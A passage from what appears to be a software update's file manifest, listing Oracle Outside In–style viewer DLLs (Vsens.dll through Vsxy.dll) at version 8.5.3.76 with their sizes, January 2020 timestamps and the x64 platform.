03-Jan-2020| 05:49| x64 \nVsens.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsenw.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:49| x64 \nVseps.dll| 8.5.3.76| 23,904| 03-Jan-2020| 05:49| x64 \nVseshr.dll| 8.5.3.76| 188,768| 03-Jan-2020| 05:49| x64 \nVsexe2.dll| 8.5.3.76| 53,088| 03-Jan-2020| 05:49| x64 \nVsfax.dll| 8.5.3.76| 26,464| 03-Jan-2020| 05:49| x64 \nVsfcd.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:49| x64 \nVsfcs.dll| 8.5.3.76| 31,072| 03-Jan-2020| 05:49| x64 \nVsfft.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsflw.dll| 8.5.3.76| 154,464| 03-Jan-2020| 05:49| x64 \nVsfwk.dll| 8.5.3.76| 45,920| 03-Jan-2020| 05:49| x64 \nVsgdsf.dll| 8.5.3.76| 89,440| 03-Jan-2020| 05:49| x64 \nVsgif.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:49| x64 \nVsgzip.dll| 8.5.3.76| 37,216| 03-Jan-2020| 05:49| x64 \nVshgs.dll| 8.5.3.76| 50,016| 03-Jan-2020| 05:49| x64 \nVshtml.dll| 8.5.3.76| 517,984| 03-Jan-2020| 05:49| x64 \nVshwp.dll| 8.5.3.76| 91,488| 03-Jan-2020| 05:49| x64 \nVshwp2.dll| 8.5.3.76| 111,968| 03-Jan-2020| 05:49| x64 \nVsich.dll| 8.5.3.76| 136,032| 03-Jan-2020| 05:49| x64 \nVsich6.dll| 8.5.3.76| 62,816| 03-Jan-2020| 05:49| x64 \nVsid3.dll| 8.5.3.76| 53,088| 03-Jan-2020| 05:49| x64 \nVsimg.dll| 8.5.3.76| 24,928| 03-Jan-2020| 05:49| x64 \nVsindd.dll| 8.5.3.76| 23,904| 03-Jan-2020| 05:49| x64 \nVsinx.dll| 8.5.3.76| 21,344| 03-Jan-2020| 05:49| x64 \nVsiwok.dll| 8.5.3.76| 36,704| 03-Jan-2020| 05:49| x64 \nVsiwok13.dll| 8.5.3.76| 1,409,384| 03-Jan-2020| 05:49| x64 \nVsiwon.dll| 8.5.3.76| 70,496| 03-Jan-2020| 05:49| x64 \nVsiwop.dll| 8.5.3.76| 40,288| 03-Jan-2020| 05:49| x64 \nVsiwp.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsjbg2.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:49| x64 \nVsjp2.dll| 8.5.3.76| 249,184| 03-Jan-2020| 05:49| x64 \nVsjw.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsleg.dll| 8.5.3.76| 41,312| 03-Jan-2020| 05:49| x64 \nVslwp7.dll| 8.5.3.76| 360,288| 03-Jan-2020| 05:49| x64 \nVslzh.dll| 8.5.3.76| 41,824| 03-Jan-2020| 05:49| x64 \nVsm11.dll| 8.5.3.76| 28,512| 03-Jan-2020| 05:49| x64 \nVsmanu.dll| 8.5.3.76| 40,288| 03-Jan-2020| 05:49| x64 \nVsmbox.dll| 8.5.3.76| 40,288| 03-Jan-2020| 05:49| x64 \nVsmcw.dll| 8.5.3.76| 44,384| 03-Jan-2020| 05:49| x64 \nVsmdb.dll| 8.5.3.76| 45,920| 03-Jan-2020| 05:49| x64 \nVsmif.dll| 8.5.3.76| 217,952| 03-Jan-2020| 05:49| x64 \nVsmime.dll| 8.5.3.76| 135,008| 03-Jan-2020| 05:49| x64 \nVsmm.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:49| x64 \nVsmm4.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:49| x64 \nVsmmfn.dll| 8.5.3.76| 31,072| 03-Jan-2020| 05:49| x64 \nVsmp.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsmpp.dll| 8.5.3.76| 249,696| 03-Jan-2020| 05:49| x64 \nVsmsg.dll| 8.5.3.76| 96,096| 03-Jan-2020| 05:49| x64 \nVsmsw.dll| 8.5.3.76| 46,432| 03-Jan-2020| 05:49| x64 \nVsmwkd.dll| 8.5.3.76| 26,464| 03-Jan-2020| 05:49| x64 \nVsmwks.dll| 8.5.3.76| 25,440| 03-Jan-2020| 05:49| x64 \nVsmwp2.dll| 8.5.3.76| 49,504| 03-Jan-2020| 05:49| x64 \nVsmwpf.dll| 8.5.3.76| 34,656| 03-Jan-2020| 05:49| x64 \nVsmwrk.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:49| x64 \nVsnsf.dll| 8.5.3.76| 38,240| 03-Jan-2020| 05:49| x64 \nVsolm.dll| 8.5.3.76| 153,952| 03-Jan-2020| 05:49| x64 \nVsone.dll| 8.5.3.76| 81,760| 03-Jan-2020| 05:49| x64 \nVsow.dll| 8.5.3.76| 24,928| 03-Jan-2020| 05:49| x64 \nVspbm.dll| 8.5.3.76| 24,928| 03-Jan-2020| 05:49| x64 \nVspcl.dll| 8.5.3.76| 23,392| 03-Jan-2020| 05:49| x64 \nVspcx.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:49| x64 \nVspdf.dll| 8.5.3.76| 260,448| 03-Jan-2020| 05:49| x64 \nVspdfi.dll| 8.5.3.76| 278,368| 03-Jan-2020| 05:49| x64 \nVspdx.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:49| x64 \nVspfs.dll| 8.5.3.76| 41,312| 03-Jan-2020| 05:49| x64 \nVspgl.dll| 8.5.3.76| 59,744| 03-Jan-2020| 05:49| x64 \nVspic.dll| 8.5.3.76| 25,440| 03-Jan-2020| 05:49| x64 \nVspict.dll| 8.5.3.76| 55,136| 03-Jan-2020| 05:49| x64 \nVspng.dll| 8.5.3.76| 53,600| 03-Jan-2020| 05:49| x64 \nVspntg.dll| 8.5.3.76| 22,880| 03-Jan-2020| 05:49| x64 \nVspp12.dll| 8.5.3.76| 131,936| 03-Jan-2020| 05:49| x64 \nVspp2.dll| 8.5.3.76| 72,032| 03-Jan-2020| 05:49| x64 \nVspp7.dll| 8.5.3.76| 77,664| 03-Jan-2020| 05:49| x64 \nVspp97.dll| 8.5.3.76| 227,680| 03-Jan-2020| 05:49| x64 \nVsppl.dll| 8.5.3.76| 39,264| 03-Jan-2020| 05:49| x64 \nVspsd.dll| 8.5.3.76| 23,904| 03-Jan-2020| 05:49| x64 \nVspsp6.dll| 8.5.3.76| 189,792| 03-Jan-2020| 05:49| x64 \nVspst.dll| 8.5.3.76| 82,272| 03-Jan-2020| 05:49| x64 \nVspstf.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsqa.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsqad.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsqp6.dll| 8.5.3.76| 53,600| 03-Jan-2020| 05:49| x64 \nVsqp9.dll| 8.5.3.76| 76,128| 03-Jan-2020| 05:49| x64 \nVsqt.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsrar.dll| 8.5.3.76| 141,152| 03-Jan-2020| 05:49| x64 \nVsras.dll| 8.5.3.76| 24,416| 03-Jan-2020| 05:49| x64 \nVsrbs.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVsrft.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:49| x64 \nVsrfx.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:49| x64 \nVsriff.dll| 8.5.3.76| 28,000| 03-Jan-2020| 05:49| x64 \nVsrtf.dll| 8.5.3.76| 171,872| 03-Jan-2020| 05:49| x64 \nVssam.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:49| x64 \nVssc5.dll| 8.5.3.76| 32,608| 03-Jan-2020| 05:49| x64 \nVssdw.dll| 8.5.3.76| 29,536| 03-Jan-2020| 05:49| x64 \nVsshw3.dll| 8.5.3.76| 40,288| 03-Jan-2020| 05:49| x64 \nVssmd.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:49| x64 \nVssms.dll| 8.5.3.76| 28,000| 03-Jan-2020| 05:49| x64 \nVssmt.dll| 8.5.3.76| 33,632| 03-Jan-2020| 05:49| x64 \nVssnap.dll| 8.5.3.76| 31,072| 03-Jan-2020| 05:49| x64 \nVsso6.dll| 8.5.3.76| 306,016| 03-Jan-2020| 05:49| x64 \nVssoc.dll| 8.5.3.76| 43,360| 03-Jan-2020| 05:49| x64 \nVssoc6.dll| 8.5.3.76| 285,536| 03-Jan-2020| 05:49| x64 \nVssoi.dll| 8.5.3.76| 40,800| 03-Jan-2020| 05:49| x64 \nVssoi6.dll| 8.5.3.76| 304,992| 03-Jan-2020| 05:50| x64 \nVssow.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:50| x64 \nVsspt.dll| 8.5.3.76| 28,000| 03-Jan-2020| 05:50| x64 \nVsssml.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:50| x64 \nVsswf.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:50| x64 \nVstaz.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:50| x64 \nVstext.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:50| x64 \nVstga.dll| 8.5.3.76| 26,976| 03-Jan-2020| 05:50| x64 \nVstif6.dll| 8.5.3.76| 103,776| 03-Jan-2020| 05:50| x64 \nVstw.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:50| x64 \nVstxt.dll| 8.5.3.76| 38,752| 03-Jan-2020| 05:50| x64 \nVsvcrd.dll| 8.5.3.76| 82,272| 03-Jan-2020| 05:50| x64 \nVsviso.dll| 8.5.3.76| 205,664| 03-Jan-2020| 05:50| x64 \nVsvsdx.dll| 8.5.3.76| 47,456| 03-Jan-2020| 05:50| x64 \nVsvw3.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:50| x64 \nVsw12.dll| 8.5.3.76| 221,536| 03-Jan-2020| 05:50| x64 \nVsw6.dll| 8.5.3.76| 138,080| 03-Jan-2020| 05:50| x64 \nVsw97.dll| 8.5.3.76| 236,896| 03-Jan-2020| 05:50| x64 \nVswbmp.dll| 8.5.3.76| 22,368| 03-Jan-2020| 05:50| x64 \nVswg2.dll| 8.5.3.76| 47,968| 03-Jan-2020| 05:50| x64 \nVswk4.dll| 8.5.3.76| 103,264| 03-Jan-2020| 05:50| x64 \nVswk6.dll| 8.5.3.76| 154,464| 03-Jan-2020| 05:50| x64 \nVswks.dll| 8.5.3.76| 48,480| 03-Jan-2020| 05:50| x64 \nVswm.dll| 8.5.3.76| 30,048| 03-Jan-2020| 05:50| x64 \nVswmf.dll| 8.5.3.76| 45,920| 03-Jan-2020| 05:50| x64 \nVswml.dll| 8.5.3.76| 68,960| 03-Jan-2020| 05:50| x64 \nVsword.dll| 8.5.3.76| 86,880| 03-Jan-2020| 05:50| x64 \nVswork.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:50| x64 \nVswp5.dll| 8.5.3.76| 75,616| 03-Jan-2020| 05:50| x64 \nVswp6.dll| 8.5.3.76| 107,360| 03-Jan-2020| 05:50| x64 \nVswpf.dll| 8.5.3.76| 30,560| 03-Jan-2020| 05:50| x64 \nVswpg.dll| 8.5.3.76| 48,480| 03-Jan-2020| 05:50| x64 \nVswpg2.dll| 8.5.3.76| 57,184| 03-Jan-2020| 05:50| x64 \nVswpl.dll| 8.5.3.76| 39,264| 03-Jan-2020| 05:50| x64 \nVswpml.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:50| x64 \nVswpw.dll| 8.5.3.76| 68,448| 03-Jan-2020| 05:50| x64 \nVsws.dll| 8.5.3.76| 37,728| 03-Jan-2020| 05:50| x64 \nVsws2.dll| 8.5.3.76| 29,024| 03-Jan-2020| 05:50| x64 \nVsxl12.dll| 8.5.3.76| 261,472| 03-Jan-2020| 05:50| x64 \nVsxl5.dll| 8.5.3.76| 289,632| 03-Jan-2020| 05:50| x64 \nVsxlsb.dll| 8.5.3.76| 244,064| 03-Jan-2020| 05:50| x64 \nVsxml.dll| 8.5.3.76| 31,584| 03-Jan-2020| 05:50| x64 \nVsxmp.dll| 8.5.3.76| 22,368| 03-Jan-2020| 05:50| x64 \nVsxps.dll| 8.5.3.76| 51,552| 03-Jan-2020| 05:50| x64 \nVsxy.dll| 8.5.3.76| 35,680| 03-Jan-2020| 05:50| x64 \nVs